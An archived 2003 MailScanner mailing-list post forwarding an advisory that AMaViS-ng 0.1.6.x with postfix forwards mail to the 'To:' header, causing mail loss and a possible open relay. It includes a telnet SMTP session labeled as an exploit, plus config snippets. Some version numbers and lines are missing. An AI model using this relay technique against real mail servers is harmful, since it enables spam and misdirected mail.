AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss (fwd)

Raymond Dijkxhoorn raymond at PROLOCATION.NET
Tue Apr 8 17:59:01 IST 2003


Naturally nobody on the list uses Amavis anymore <cough cough> but just in
case you see it happening:

---------- Forwarded message ----------
Date: Mon, 7 Apr 2003 14:23:47 +0200
From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 at>
Subject: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss

Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: and; 0.1.4.x is
not vulnerable), all email gets forwarded to the address specified by the
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX at domainX.tld
(250 ok)
rcpt to:userY at domain.tld
(250 ok)
(354 End data with <CR><LF>.<CR><LF>)
From: userX at domainX.tld
To: userZ at domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
(250 Ok: queued as ...)
(221 Bye)

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x
installed must accept emails for userY at domain.tld.

What does it to:
userX at domainX.tld is sending an email to userY at domain.tld. The header of this
email contains "To: userZ at domain.tld". AMaViS-ng seems to parse the header
and forwards the email to userZ at domain.tld. userY at domain.tld does not get
this email.
As many postfix users trust their localhost (no restrictions for localhost),
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of

# $amavis-ng/amavis.conf
mail-transfer-agent = Postfix

postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc

More information about the MailScanner mailing list